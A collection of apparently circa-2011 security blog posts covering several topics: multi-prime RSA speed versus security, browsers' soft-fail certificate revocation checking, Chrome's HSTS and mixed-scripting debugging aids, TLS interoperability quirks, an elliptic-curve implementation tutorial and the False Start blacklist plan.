I used the equations from Lenstra (Unbelievable security: Matching AES security using public key systems, in ASIACRYTPT 2001) and scaled them so that two prime, 1024 bit RSA is 80 bits. The speed numbers are from OpenSSL for a single core of a Xeon E5520 at 2.3GHz.

I'm assuming a 2048-bit modulus. The blue, horizontal lines are the estimated difficulty of the NFS for 2048 and 1024-bit composities. The blue curve is the estimated difficulty of factoring a multi-prime composite using ECM. Really you don't want to choose so many primes at this drops below the NFS level.

image/svg+xml Produced by GNUPLOT 4.2 patchlevel 6 0 500 1000 1500 2000 2 3 4 5 6 7 8 0 50 100 150 ops/s security (bits) Num primes Security Speed

A couple of useful observations from this data: For 2048-bits, 3 primes is the most you want (this is confirmed by table 1 of this paper). Also, if your CA is requiring a 2048-bit modulus, you can use seven primes to get basically the same speed and security as a 1024-bit key.

This is the same data, in table form:

1024-bits (80-bit NFS security)

nops/sECM security
21807104
3268086
4430575

2048-bits (107-bit NFS security)

nops/sECM security
2279148
3524121
4872106
5104795
6126387
7157981
8199777

4096-bits (144-bit NFS security)

nops/sECM security
238213
377173
4135150
5193135
6254123
7288114
8409107

Revocation doesn't work

When an HTTPS certificate is issued, it's typically valid for a year or two. But what if something bad happens? What if the site loses control of its key?

In that case you would really need a way to invalidate a certificate before it expires and that's what revocation does. Certificates contain instructions for how to find out whether they are revoked and clients should check this before accepting a certificate.

There are basically two methods for checking if a certificate is revoked: certificate revocation lists (CRLs) and OCSP. CRLs are long lists of serial numbers that have been revoked while OCSP only deals with a single certificate. But the details are unimportant, they are both methods of getting signed and timestamped statements about the status of a certificate.

But both methods rely on the CA being available to answer CRL or OCSP queries. If a CA went down then it could take out huge sections of the web. Because of this, clients (and I'm thinking mainly of browsers) have historically been forgiving of an unavailable CA.

But an event this week gave me cause to wonder how well revocation actually works. So I wrote the the world's dumbest HTTP proxy. It's just a convenient way to intercept network traffic from a browser. HTTPS requests involve the CONNECT method, which is implemented. All other requests (including all revocation checks) simply return a 500 error. This isn't even as advanced as Moxie's trick of returning 3.

To be clear, the proxy is just for testing. An actual attack would intercept TCP connections. The results:

Firstly, IE 8 on Windows 7:

No indication of a problem at all even though the revocation checks returned 500s. It's even EV.

(Aside: I used Wireshark to confirm that revocation checks weren't bypassing the proxy. It's also the case that SChannel can cache revocation information. I don't know how to clear this cache, so I simply used a site that I hadn't visited before. Also confirming that a cache wasn't in effect is the fact that Chrome uses SChannel to verify certificates and Chrome knew that there was an issue..)

Firefox 3.6 on Windows 7, no indication:

Update: George Macon pointed out that Firefox removes the EV indication from this site. I'm not a regular Firefox user so I'm afraid that I didn't notice:

Chrome 12 on Windows 7:

There's something at least! We can click on it...

So Chrome has an indication but it's the same indication as mixed-content and I suspect that rather a lot of people will ignore it. There is one saving grace, Chrome implements HSTS and for HSTS sites, revocation failure is fatal:

Update: I changed this behaviour. See http://www.ietf.org/mail-archive/web/websec/current/msg00296.html

On other platforms, the story is much the same. Safari doesn't indicate that anything is wrong, nor does Firefox 4 on OS X, nor Firefox 3.6 on Linux. Chrome on Mac is the same as Windows, but on Linux doesn't indicate and doesn't protect HSTS sites. (Chrome Linux's behaviour is due to a limitation in NSS as I understand it.).

So, what's the effect? Well it depends where an attacker is. If the attacker is spoofing a site and is situated close to the site then they can attack all users, because they can get all the traffic destined for the site. However, such an attacker probably can't intercept traffic to the CA's servers, so revocation will actually work because the users will receive a firm ‘revoked’ message from the CA. If the attacker is close to the user, then they can only attack a smaller number of users, but they can intercept traffic to the CA and thus defeat revocation. Attacks in Tunisia and only open WiFi networks are the sort of attacks which can defeat revocation.

So should browsers be stricter about revocation checking? Maybe, but it does mean that a CA outage would disable large parts of the web. Imagine if Verisign corrupted their revocation database and were down for six hours while they rebuilt it. An global outage of large parts of the HTTPS web like that would seriously damage the image of web security to the point where sites would think twice about using HTTPS at all.

(You can configure Firefox to be strict about checking if you wish: security.OCSP.require in about:config.)

A much better solution would be for certificates to only be valid for a few days and to forget about revocation altogether. This doesn't mean that the private key needs to change every few days, just the certificate. And the certificate is public data, so servers could just download their refreshed certificate over HTTP periodically and automatically (like OCSP stapling). Clients wouldn't have to perform revocation checks (which are very complex and slow), CAs wouldn't have to pay for massive, DDoS proof serving capacity and revocation would actually work. If the CA went down for six hours, nobody cares. Only if the CA is down for days is there a problem. If you want to “revoke” a certificate, just stop renewing it.

HSTS UI in Chrome

HSTS is designed to address the fact that HTTP is the default protocol on the web. You might run a secure site that redirects everyone to HTTPS, but your users will just type in foo.com and that initial HTTP request is vulnerable to manipulation and SSL stripping attacks.

HSTS allows sites to advertise that they are HTTPS only. See the Chromium site page for more details.

However, it's difficult to test HSTS. Chrome's HSTS database stores only the hashes of sites (which may not have been the right choice, but I don't see sufficient motivation to change it at the moment) so it's hard to edit by hand. There are tools like craSH's Chrome-STS to help edit the database, but it's too hard for the average developer.

So I've added a debugging UI to Chrome to query, add and remove entries from the HSTS database. You have to type about:net-internals into the address bar and click the HSTS tab. You also need a version of Chrome after r75282. Today that means a trunk build but it should be in the dev channel release next week. Until then, here's a screenshot:

So, if you want to see if your site will break before deploying HSTS, you can add an entry locally for it and find out. Modifications persist on disk and have a expiry of 1000 days. You can also use it as a way to elect to always access sites via HTTPS (i.e. mail.google.com).

Origin poisoning

Mixed-scripting is when an HTTPS page loads resources like Javascript, CSS or plugins over HTTP. It's a subset of `mixed-content' but it's the really dangerous subset: by controlling those types of resources a network attacker can take control of the whole page rather than just, say, a single image.

Chrome, unlike other browsers, tracks mixed-scripting for origins rather than for pages. This means that, if page x triggers mixed-scripting and you follow a link to another page, y, in the same origin, we'll decorate y with mixed-scripting warnings even if it's clean when considered in isolation. This is because Javascript can control other pages in the same origin, see this paper.

Chrome's detection actually errs a little on the side of too many warnings. Strictly speaking, if there's only a single page open in the origin and you navigate it, then there's nowhere for evil Javascript to hide and so the next page can be clean. Chrome, rather, considers an origin to be poisoned once it has triggered mixed-scripting and that taint is only lifted once that renderer process has shutdown.

(Although there's also an argument to be made that Chrome's behavior is fine. Consider this case: you log into a web email client and the front page has mixed scripting. Then you click a link to compose an email. The compose page might be free of mixed-scripting and all the evil Javascript might have been flushed. But the mixed-scripting could have switched your cookies and logged you in as the attacker's account. Now, when you send the email, it'll appear in the attacker's `Sent Mail'.)

But that's all background. The problem is that developers get confused about these mixed-scripting warnings and invariably blame Chrome. If you have a mixed-scripting issue occur on a page which redirects, or in an HTTPS iframe on an HTTP site, then the Javascript console doesn't help you. If can be very difficult to figure out what the problem is.

So I've landed a patch in Chrome which logs mixed-scripting to the debug log no matter where it occurs. Just get a build after r74119 (see about:version) and follow the instructions to enable debugging logging.

Still not computationally expensive

F5 have put up a blog post explaining why my previous statements about SSL's computational costs are a myth. I'm glad that the idea is getting out there!

Keep in mind, however, that F5 want to sell you SSL hardware and that the blog post is a marketing piece. (I've never used F5 products but, from the client side, I've never found any problems with them either.)

Some assertions in the text are simple and wrong, so I'll just point these out:

  • “All commercial certificate authorities now issue only 2048-bit keys”: clearly wrong, as anyone can confirm.
  • They link to a nearly 5-year old version of the NIST guidelines rather than the guidelines issued last month.
  • Their numbers RSA operations per second are both slow (it matches my 2.3Ghz, Core2 laptop) and per core. An eight-core server is over eight times faster than they suggest!
  • “Obviously the more servers you have, the more certificates you need to deploy”: bizarrely, they assume that you're putting a different certificate on each server.

Certificate lengths

It's true that NIST have recommended that 1024-bit certificates should be phased out by 2013. CA certificates should be 2048-bit now and we need to work to remove the 1024-bit ones.

But even in 2013 it's still going to take tens of millions of dollars of computer hardware a year to factor a 1024-bit RSA key. If you're the sort of organisation which is considering deploying HTTPS do you think that your attackers are going to do that, or are they going to bribe someone to steal the private key from the servers?

Likewise, SSL hardware will probably make your key harder to steal via a software exploit, but keys can be revoked the problem dealt with. There are some organisations where hardware protected keys make sense, but for 99% of sites, key material isn't what's important. It would be far more damaging for customer data to be dumped on the web and SSL hardware doesn't save you there.

As we go towards 2013, CAs will try to issue fewer 1024-bit certificates and 2048-bit certificates are 5x slower. But it only takes one CA to start issuing ECDSA certificates along with a 2048-bit RSA one and the problem is much less vexing. Browsers largely support it and you can serve the ECDSA certificate to the ones which do and the RSA to the rest. P256-ECDSA is about as fast as 1024-bit RSA. The only problem is that people don't know to demand it from their CAs so the CAs don't do it yet.

Ciphers

RC4 has good key agility, it's a stream cipher (which saves bytes on the wire), it's quick and very well analysed. It's not the strongest cipher in the world, but it's significantly stronger than some other parts of the SSL ecosystem. With overwhelming probability, you are not the sort of organisation that needs to worry about attackers brute-forcing your cipher.

All together now...

SSL is just not that computationally expensive any more. Here are the real costs of HTTPS deployment these days:

  • Virtual hosting still doesn't work in the real world because Microsoft never put support into Windows XP.
  • Sorting out mixed content issues on your website.

The F5 article does mention the first of these, but SSL hardware doesn't help with either of them.

All sites should deploy HTTPS because attacks like Firesheep are too easy to do. Even sites where you don't login should deploy HTTPS (imagine the effect of spoofing news websites at a major financial conference to headline “Market crashes”). You should use HSTS to stop sslstrip. But you are probably not the sort of organisation which needs to worry about multi-million dollar attacks aimed at factoring your key.

Unfortunate current practices for HTTP over TLS

(For amusement value.)

Network Working Group                                         A. Langley
Internet-Draft                                                Google Inc
Expires: July 5, 2011                                           Jan 2011


            Unfortunate current practices for HTTP over TLS
                      draft-agl-tls-oppractices-00

Abstract

   This document describes some of the unfortunate current practices
   which are needed in order to transport HTTP over TLS on the public
   Internet.

Status of this Memo

   This Internet-Draft is submitted to IETF in full conformance with the
   provisions of BCP 78 and BCP 79.

   Internet-Drafts are working documents of the Internet Engineering
   Task Force (IETF), its areas, and its working groups.  Note that
   other groups may also distribute working documents as Internet-
   Drafts.

   Internet-Drafts are draft documents valid for a maximum of six months
   and may be updated, replaced, or obsoleted by other documents at any
   time.  It is inappropriate to use Internet-Drafts as reference
   material or to cite them other than as "work in progress."

   The list of current Internet-Drafts can be accessed at
   http://www.ietf.org/ietf/1id-abstracts.txt.

   The list of Internet-Draft Shadow Directories can be accessed at
   http://www.ietf.org/shadow.html.

   This Internet-Draft will expire on July 5, 2011.

Copyright Notice

   Copyright (c) 2011 IETF Trust and the persons identified as the
   document authors.  All rights reserved.

   This document is subject to BCP 78 and the IETF Trust's Legal
   Provisions Relating to IETF Documents
   (http://trustee.ietf.org/license-info) in effect on the date of
   publication of this document.  Please review these documents
   carefully, as they describe your rights and restrictions with respect
   to this document.  Code Components extracted from this document must
   include Simplified BSD License text as described in Section 4.e of
   the Trust Legal Provisions and are provided without warranty as
   described in the BSD License.


Table of Contents

   1.  Introduction . . . . . . . . . . . . . . . . . . . . . . . . .  3
   2.  Handshake message fragmentation  . . . . . . . . . . . . . . .  4
   3.  Protocol Fallback  . . . . . . . . . . . . . . . . . . . . . .  5
   4.  More implementation mistakes . . . . . . . . . . . . . . . . .  6
   5.  Certificate Chains . . . . . . . . . . . . . . . . . . . . . .  7
   6.  Insufficient Security  . . . . . . . . . . . . . . . . . . . .  8
   7.  Acknowledgements . . . . . . . . . . . . . . . . . . . . . . .  9
   8.  Normative References . . . . . . . . . . . . . . . . . . . . . 10
   Appendix A.  Changes . . . . . . . . . . . . . . . . . . . . . . . 11
   Author's Address . . . . . . . . . . . . . . . . . . . . . . . . . 12


1.  Introduction

   HTTP [RFC2616] is one of the most common application level protocols
   transported over TLS [RFC5246].  (This combination is commonly known
   as HTTPS based on the URL scheme used to indicate it.)  HTTPS clients
   have to function with a huge range of TLS implementations, some of
   higher quality than others.  This text aims to document some of the
   behaviours of existing HTTPS clients that are designed to ensure
   maximum interoperability.

   This text should not be taken as a recommendation that future HTTPS
   clients adopt these behaviours.  The security implications of each
   need to be carefully considered by each implementation.  However,
   these behaviours are common and the authors consider it better to
   document the state of practice than to simply wish it were otherwise.


2.  Handshake message fragmentation

   Many servers will fail to process a handshake message that spans more
   than one record.  These servers will close the connection when they
   encounter such a handshake message.  HTTPS clients will commonly
   ensure against that by either packing all handshake messages in a
   flow into a single record, or by creating a single record for each
   handshake message.


3.  Protocol Fallback

   Despite it being nearly twelve years since the publication of TLS 1.0
   [RFC2246], around 3% of HTTPS servers will reject a valid TLS
   "ClientHello".  These rejections can take the form of immediately
   closing the connection or a fatal alert.  Intolerance to the
   following has been observed:

      Advertising version TLS 1.0.

      Advertising a TLS version greater than TLS 1.0 (around 2% for 1.1
      or 1.2, around 3% for greater than 1.2).

      Advertising a version greater than 0x03ff (around 65% of servers)

      The presence of any extensions (around 7% of servers)

      The presence of specific extensions ("server_name" and
      "status_request" intolerance has been observed, although in very
      low numbers).

      The presence of any advertised compression algorithms

   Next, some servers will misbehave after processing the "ClientHello"
   message.  Negotiating the use of "DEFLATE" compression can result in
   fatal "bad_record_mac", "decompression_failure" or
   "decryption_failed" alerts.  Notably, OpenSSL prior to version 0.9.8c
   will intermittently fail to process compressed finished messages due
   to a work around of a previous padding bug.

   Lastly, some servers will negotiate the use of SSLv3 but select a
   TLS-only cipher suite.

   In all these cases, HTTPS clients will often enter a fallback mode.
   The connection is retried using only SSLv3 and without advertising
   any compression algorithms.  (This is obviously an easy downgrade
   attack.)  Also, the fallback can be triggered by transient network
   problems, which often manifest as an abruptly closed connection.
   Since SSLv3 does not provide any means of Server Name Indication
   [RFC3546], the fallback connection can use the wrong certificate
   chain, resulting in a very surprising certificate error.


4.  More implementation mistakes

   Non-fatal errors in version negotiation also occur.  Some 0.2% of
   servers use the version from the record header.  Around 0.6% of
   servers require that the version in the "ClientHello" and record
   header match in order to respect the version in the "ClientHello".  A
   very low number of servers echo whatever version the client
   advertises.

   In the event that the client supports a higher protocol version than
   the server, about 0.4% of servers require that the RSA
   "ClientKeyExchange" message include the server's protocol version.

   Some 30% of servers don't check the version in an RSA
   "ClientKeyExchange" at all.


5.  Certificate Chains

   Certificate chains presented by servers will commonly be missing
   intermediate certificates, have certificates in the wrong order and
   will include unrelated, superfluous certificates.  Servers have been
   observed presenting more than ten certificates in what we assume is a
   drive-by shooting approach to including the correct intermediate
   certificate.

   In order to validate chains which are missing certificates, some
   HTTPS clients will collect intermediate certificates from other
   servers.  Clients will commonly put all the presented certificates
   into a set and try to validate a chain assuming only that the first
   certificate is the leaf.


6.  Insufficient Security

   Some 65% of servers support SSLv2 (beyond just supporting the
   handshake in order to upgrade to SSLv3 or TLS).  HTTPS clients will
   typically not support SSLv2, nor send SSLv2 handshakes by default.
   Of those servers, 80% support the export ciphersuites.  (Although
   about 3% of those servers negotiate weak ciphersuites only to show a
   warning.)

   Some servers will choose very small multiplicative group sizes for
   their ephemeral Diffie-Hellman exchange (for example, 256-bits).
   Some HTTPS clients will reject all multiplicative group sizes smaller
   than 512-bits while others will retry after demoting DHE ciphersuites
   in their "ClientHello".


7.  Acknowledgements

   Yngve Pettersen made significant contributions and many of the
   numbers in this document come from his scanning work.  Other numbers
   were taken from Ivan Ristic's SSL Survey.

   Thanks to Wan Teh Chang for reviewing early drafts.


8.  Normative References

   [RFC2246]  Dierks, T. and C. Allen, "The TLS Protocol Version 1.0",
              RFC 2246, January 1999.

   [RFC2616]  Fielding, R., Gettys, J., Mogul, J., Frystyk, H.,
              Masinter, L., Leach, P., and T. Berners-Lee, "Hypertext
              Transfer Protocol -- HTTP/1.1", RFC 2616, June 1999.

   [RFC3546]  Blake-Wilson, S., Nystrom, M., Hopwood, D., Mikkelsen, J.,
              and T. Wright, "Transport Layer Security (TLS)
              Extensions", RFC 3546, June 2003.

   [RFC5246]  Dierks, T. and E. Rescorla, "The Transport Layer Security
              (TLS) Protocol Version 1.2", RFC 5246, August 2008.

OpenSSH 5.7 with ECC support

OpenSSH 5.7 has been released and its major notable new feature is support for ECDH key agreement and ECDSA host and user keys.

What a difference a prime makes

In a previous post I covered some of the issues with implementing ECC operations. I also mentioned the problems with the number of terms in the P256 prime.

Having spent a fair amount of time optimising OpenSSL's elliptic curve code, here are the current speeds:

image/svg+xml Produced by GNUPLOT 4.2 patchlevel 6 0 500 1000 1500 2000 2500 3000 3500 4000 4500 5000 80 100 120 140 160 180 200 220 240 260 1024-bit DH 2048-bit DH P224 curve25519 P256 P521 Security level (bits) Operations / core second

(The graph is inline SVG. Can't see it? Get a better browser.)

P224 and P256 are not, fundamentally, very different. However, P256 has a nasty prime formation, as I explained previously, which kills the speed. Sadly, if you want to support the existing fleet of browsers, P256 is your fastest option.

(The multiplicative DH is measured using OpenSSL's code. curve25519 is my own code, based on djb's. P224 is Emilia Kasper's, inspired by curve25519. P521 is my own code based on Emilia's. P256 is my own code, also based on Emilia's, with a very different form from in an attempt to get it running faster.)

(The measurements are taken on a single core of my 2.3GHz Xeon E5520. They are a scalar multiplication of the base point followed by a scalar multiplication of the result. They don't include point validation. The OpenSSL code involves additional overhead from the BIGNUM conversions, however I consider that fair game because you have to do them if you want to use the code.)

Elliptic curves and their implementation (pointer)

If you read this via Google Reader (or, possibly, other feed readers) then the last post won't have appeared, possibly because of the inline SVG (getting cut by the bleeding edge again).

So, click to read Elliptic curves and their implementation.

Elliptic curves and their implementation

So what's an elliptic curve? Well, for starters, it's not an ellipse. An elliptic curve is a set of points on a plane which satisfy an equation of the form y2 = x3 + ax + b.

As an example, here's the elliptic curve y2 = x3 - 3x + 3:

image/svg+xml 1 2 3 -1 -2 -3 1 2 3 -1 -2 -3

(Thanks to Wolfram Alpha for plotting the curve. Can't see the diagram? Get a better browser).

At this point I'm going to point out that I'm omitting details in order to keep things simple and I'm going to keep doing it without mentioning it again. For example, that elliptic curve equation is based on a transformation which is only valid if the underlying field characteristic is not 2 nor 3. If you want to full details then you should read up. Carrying on …

So the elliptic curve is the set of points which satisfy an equation like that. For the curve above you can see that (1, 1) and (1, -1) are both on the curve and a quick mental calculation should confirm that they fit into the equation.

But the points on an elliptic curve aren't just a set of points, with a small hack they have a structure to them which is sufficient to form a group. (A group is a mathematical term, not just a noun that I pulled from the air.)

Being a group requires four things: that you can add two elements to get a third element which is also in the group. That this is true for all elements: (a + b) + c = a + (b + c). That there's a zero element so that a + 0 = a. Finally that, for every element, there's a negative of that element (written -a), so that a + -a = 0.

And, when you define addition correctly, the set of points on an elliptic curve has that structure. Also, the addition rule for elliptic curves has a very nice graphical definition, so I can give you a couple more diagrams.

The addition rule says that, to add a and b, you draw a line from a to b, intersect it with the curve and reflect in the x-axis:

image/svg+xml a b a+b 1 2 3 -1 -2 -3 1 2 3 -1 -2 -3

There's a slight wrinkle in this: what if a and b are the same point? A line needs two, distinct points to be defined.

So there's a special rule for doubling a point: you take the tangent to the curve at that point, intersect it with the curve and then reflect in the x-axis:

image/svg+xml a 2a 1 2 3 -1 -2 -3 1 2 3 -1 -2 -3

So we defined addition, but the zero element is a bit of a hack. First, we define the negative of an element to be its reflection in the x-axis. We know that adding an element and its negative results in the zero element so think about what adding an element and its reflection means. We draw a line from the element to its reflection, which means that the line is vertical. Now we have to find the third point where that line intersects the curve. But, from looking at the y2 term of the equation, it's clear that the curve only has two solutions for any given x value. So the line doesn't intersect the curve!

And this is where the zero element comes from. It's called the point at infinity and it's a magic element which is infinitely far away. This means that the vertical line ends up hitting it. It also means that it's directly above every point so, when you add the zero element to a point, you get its reflection which you then reflect back to the original point.

And, with that brief wart, we have a group! But what's the point? Well, given addition, you can define multiplication (it's just repeated addition). So, given a curve and a point on that curve (called the base point and written G), you can calculate some multiple of that point. But, given the resulting point, you can't feasibly work backwards to find out what the multiple was. It's a one-way function.

To see how this might be useful for cryptography our old friends, Alice and Bob, enter the scene. They are standing in a room with lots of other people and would like a private conservation, but there's not enough room. Thankfully, Alice and Bob both know a standard, public elliptic curve and base point. Each think up a random number and multiply the base point by that number.

We'll call Alice's random number a and Bob's, b. Each tell the other (and, therefore, everyone) aG and bG: the multiples of the base point. So Alice knows a and bG and multiplies the latter by the former to get abG. Bob knows b and aG and multiplies the latter by the former to get baG. abG = baG so both now have a shared, private key. The other people in the room know only aG and bG and they can't divide to get either a nor b, so they can't calculate the secret.

(That's an elliptic curve Diffie-Hellman key agreement.)

Implementing elliptic curve operations in software.

The diagrams for addition and doubling are pretty, but aren't code. Thankfully they translate pretty easily into equations which can be found at the top of the EFD page for Short Weierstrass curves (which is the specific subset of elliptic curve that we're dealing with).

Those equations are defined in terms of affine coordinates (i.e. (x,y) pairs) but serious implementations will invariably use a transformation. Transformations are applied at the start of a long calculation so that the steps of the calculation are easier. The transformation can be reversed at the end to get affine coordinates out.

A common example of a transformation is the use of polar coordinates. When working with points on the plane, working with polar coordinates can make some calculations vastly easier. Elliptic curve transformations are like that, although with different transformations.

The transformations that you'll commonly see are Jacobian coordinates and XZ (aka Montgomery's trick), although the latter sort of isn't invertible (more on that later).

The underlying field

When we defined the elliptic curve, above, we talked about a set of points but we never defined a point. Well, a point on the plane can be represented as an (x,y) pair, but what are x and y? If this were a maths class they would be elements of ℜ, the set of real numbers. But real numbers on computers are either very slow or approximate. The rules of the group quickly breakdown if you are only approximate.

So, in cryptographic applications, we use an alternative, finite field. (Again, field is a mathematical term, like group.) The finite fields in this case are the numbers modulo a prime. (Although all finite fields of the same size are isomorphic so it doesn't really matter.)

At this point, we're going to speed up. I'm not going to explain finite fields, I'm going to jump into the tricks of implementation. If you made it this far, well done!

It's important to keep in mind that we have two different structures in play here. We have the elliptic curve group, where we are adding and doubling points on the curve, and we have the underlying field. In order to do operations on the group, we have to do a number of operations on elements of the underlying field. For example, here's the formula for group addition under a Jacobian transform. It's given a cost in terms of the underlying field: 11 multiplications plus five squarings.

Our job is to do these group and field operations quickly and in constant time. The latter is important! Look at the power of the timing attacks against AES and RSA!

Limb schedules

If the order of the field is between 2n-1 and 2n then we call it an n-bit group. (The order can't be 2n for n > 0 because the order must be prime and 2n is even.)

For cryptographically useful field sizes, elements aren't going to fit in a single register. Therefore we have to represent field elements with a number of limbs (which we'll call a, b, c, ...). If we were working in a field of size 2127-1 then we might represent field elements with two limbs by 264×a + b. Think of it as a two digit number in base 264.

Since we're using a pair of 64-bit limbs and we're probably putting them in 64-bit registers this is a uniform, saturated (because the registers are full) limb schedule. As a is multiplied by 264 we say that it's “at 264”.

However, we're going to hit some issues with this scheme. Think about squaring these field elements (multiplication is the same, but I would need more variables). Squaring means calculating a2 + 2ab + b2. That results in limbs at 20 (b2), 264 (the middle term) and 2128 (a2).

But multiplying the 64-bit limbs gives a 128-bit result (x86-64 chips can do that, although you need some tricks to pull it off from C code). When it comes to the middle term, you can't multiply the 128-bit by 2 without overflowing. You would have to process the result into a form which you could manipulate. Also, if you look at the algorithms which we're implementing, there are small scalar factors and subtractions, both of which are much easier to do with some headroom.

So we could consider an unsaturated schedule. For example, for a 224-bit field, four 56-bit limbs works well. It's still uniform, but the results of multiplication are only 112-bit, so you can add several of those numbers together in a 128-bit limb without overflowing.

There are also non-uniform schedules. For a 255-bit field, a schedule of 25, 26, 25, 26, ... for ten limbs works well. It's best to keep the schedule as uniform as possible however, otherwise, when multiplying, you end up with values at odd positions and might not have enough headroom to shift them in-place to match up with a limb position.

Prime structures

When implementing curves you typically don't get to choose the prime. There are a few standard primes defined by NIST (in FIPS 186-3) and less common ones (like curve25519).

The structure of the prime matters because the most complex operation will be the reduction. When we did a squaring in the example above, we ended up with a term at 128 bits. We have to eliminate that otherwise, as we keep multiplying results, the results will just get bigger and bigger.

If you think of reducing 2127 modulo 2127-1, I hope it's clear that the result is one. If you had a limb at 127 bits, then you could just take that value, add it in at 0 bits and drop the limb at 127 bits. A limb at 127 bits `reflects' off the term at 20 and ends getting added in at 0 bits.

Since we had a limb at 128 bits, its reflection off that term ends up at 1 bit. So we would have to left shift the limb by one before adding it in at 0. (And hope that your limb schedule gave you some headroom to do the left shift!). That's pretty much an ideal case and 2127-1 is called a Mersenne prime. Sadly, there aren't any between 2127-1 and 2521-1, so you'll probably get something harder.

Take NIST's P256 curve. Here the prime is 2256 - 2224 + 2192 + 296 - 1. It was designed so that, with 32-bit limbs, all the reflections end up on 32-bit boundaries. However, we have 64-bit systems these days and we really don't want to waste those big 64-bit full multipliers. However, the prime is nasty for other limb structures. That term at 224 bits is so high up that reflections off it usually end up above 256 and get reflected again. That's terrible if your limbs don't line up with the reflections. For example, if you try 52-bit, unsaturated limbs with that prime, then the reflections for the limb at 416 bits are at 224, 192, 160, 128, 96, 64, 32, and 0 bits! With all that shifting and adding (and more because you don't have enough headroom for all those shifts), you end up with a slow reduction.

I have typically ended up experimenting with different limb schedules and seeing which is the fastest. You can get a rough feeling for how well a given schedule will do but, with CPUs being so complex these days, it's never terribly clear which will be the fastest without trying them.

Inversion

The usual way to do inversion in a finite field is with Euclid's algorithm. However, this isn't constant time. Thankfully, we can use Fermat's little theorem (xp ≅ x (mod p)) and notice that it easily follows that xp-2 ≅ x-1 (mod p). So, just raise the element to power of p - 2. It's a long operation, but you don't do it very often.

(Credit to djb for that trick.)

Subtraction

Although you can use signed limbs, I consider the complexity to be too much to bother with. But, without signed limbs how do you do subtraction?

Well, everything is modulo p, so we can always add 0 mod p. If you have unsaturated limbs then the top bits of the limb overlap with the bottom bits of the next limb. So, you can add a large number to the first limb and subtract a small number from the next one. But what stops the next limb from underflowing? Well, you want to add the same large number there and subtract from the next etc.

This continues until you reach the top limb. Here, you can calculate the excess, reduce modulo p and correct the lower limbs to counteract it. In the end, you end up with a few, static values which you can quickly add to a field element without changing the element value, but so that you can now prove that the subtraction doesn't underflow any limbs.

(Credit to Emilia Kasper for that one.)

Remarks

I could write a lot more, but it's getting late. The reason for this write up is that I'm currently working on a fast P256 implementation for OpenSSL. It won't be as fast as I would like due to the issues with the P256 prime, given above. But, I hope to be done by the end of the week and hope to have some exciting news about it in the new year.

Google Charts API over HTTPS

I'm happy to announce that the Google Charts API is now available over HTTPS at https://chart.googleapis.com. For example:

The documentation should be updated in due course.

Random number generators in Psi experiments

(Note: I'm not making any comment on the research in question, merely making a technical remark.)

In Feeling the Future, the author, D. Bem, has an interesting problem (page 11 of the linked preprint). If an experiment shows that people can predict the output of a RNG, what does that tell us?

Well, if the RNG was a PRNG, seeded at the beginning of the experiment, then the subject could either be showing precognition (i.e. they can sense the result from the future) or clairvoyance (i.e. they can sense the state of the PRNG and thus know the next result). If you clock a true, hardware RNG before the trial then the same possibilities arise.

If you clock a true RNG after the trial however, then the possibilities are precognition and psycokinesis (i.e. the subject altered the state of the RNG, causing the result).

My observation was that you could XOR a PRNG and a RNG. (The latter being clocked after the trial.) In this case, prediction implies, at least, either both clairvoyance (for the PRNG) and psychokinesis (for the RNG), or precognition. That appears to be a useful trick.

However, this rather relies on the result that the sum of two RNGs is at least as random as the best of them. However, if we have a result which suggests precognition, then that doesn't hold! An evil RNG could, when summed with a true RNG, predict its future output and cancel it out, resulting in a less random result!

Changing HTTPS

At Google we're pretty fanatical about speed. We know that when things run faster people aren't just happier to use them, but that it fundamentally changes the way that people use them. That's why we strive to make Chrome the fastest browser possible and include experiments like SPDY.

As part of this, we've been looking at SSL/TLS, the protocol which secures HTTPS. We love SSL/TLS because of the privacy and security that it gives to our users and, like everything, we want to make it faster.

One of the simplest changes that we're experimenting with is called False Start. It can shave a round trip from the setup time of many HTTPS connections. A round trip varies depending on how far away the webserver is from the client. Crossing the continental US and back takes about 70ms. Going from the west coast to Europe and back takes about 150ms.

That might not seem like very much. But these costs are multiplied when loading a complex site. If it takes an extra 100ms to start fetching the contents of the page, then that's 100ms until the browser discovers resources on other websites that will be needed to render its contents. If loading those resources reveals more dependents then they are delayed by three round trips.

And this change disproportionately benefits smaller websites (who aren't multihomed around the world) and mobile users or areas with poorer Internet connectivity (who have longer round trip times).

Most attractively, this change can be made unilaterally. Browsers can implement False Start and benefit without having to update webservers.

However, we are aware that this change will cause issues with about 0.05% of websites on the Internet. There are a number of possible responses to this:

The most common would be to admit defeat. Rightly or wrongly, users assign blame to the last thing to change. Thus, no matter how grievous or damaging their behaviour, anything that worked at some point in the past is regarded as blameless for any future problem. As the Internet becomes larger and more diverse, more and more devices are attached that improperly implement Internet protocols. This means that any practice that isn't common is likely to be non-functional for a significant number of users.

In light of this, many efforts which try to make lower level changes fail. Others move on top of common protocols in the hope that bugs in the network don't reach that high.

Chrome still carries an idealism that means that we're going to try to make low level changes and try to make them work.

The second common response to these problems is to work around them. This means detecting when something has gone wrong and falling back to the old behaviour. In the specific case of False Start, detecting the failure is problematic. However, even if it were not, then we still wouldn't want to work around the issue because we think that it's damaging to the Internet in its own way.

Fallbacks allow problematic sites to continue to function and stems the flow of angry users. That alone makes it very attractive to developers. However, it also removes any motivation for the sites to change. In most cases, it means that sites will never even know about the issue. Fallbacks do nothing to move the world towards a position where the change in question functions correctly.

Additionally, fallbacks add more unwritten rules and complexity. As an example, take the change from SSLv3 to TLS 1.0. This was a change to the same SSL/TLS protocol that False Start changes and it was finialised as a standard nearly 12 years ago. TLS 1.0 was designed so that browsers could talk to older SSLv3 websites without issues. The only slight problem was that some webservers needed to be updated to ignore some extra data that TLS 1.0 clients would send. A very minor change.

In order to make the transition smoother, browsers added a fallback from TLS to SSLv3. The Internet in 1999 was a much smaller and more flexible place. It was assumed that the problematic webservers could be fixed in a few years and the fallback could be removed.

Twelve years later, the fallback is in robust health and still adding complexity. A security update to TLS earlier this year was made much more complex by the need to account for SSLv3 fallback. The operators of the problematic webservers are largely unaware of the problems that they are causing and have no incentive to change in any case. Meanwhile, the cost of SSLv3 fallback continues to accumulate.

Because of these problems, we're going to try a new approach with False Start: blacklists.

Chrome (on the dev channel at first) will contain a list of the 0.05% of problematic sites and we won't use False Start with them. We're generating this list by probing a large list of websites although, of course, we'll miss some which we'll have to address from bug reports.

Blacklisting gives us two advantages. Firstly, it limits the accumulation of new problematic websites. Sites which have never worked are a very different case from sites which used to work.

Secondly, we can contact the problematic sites in question. We already have a good idea of where the problem lies with many of them and we're in contact with the stakeholders to plan a way forward.

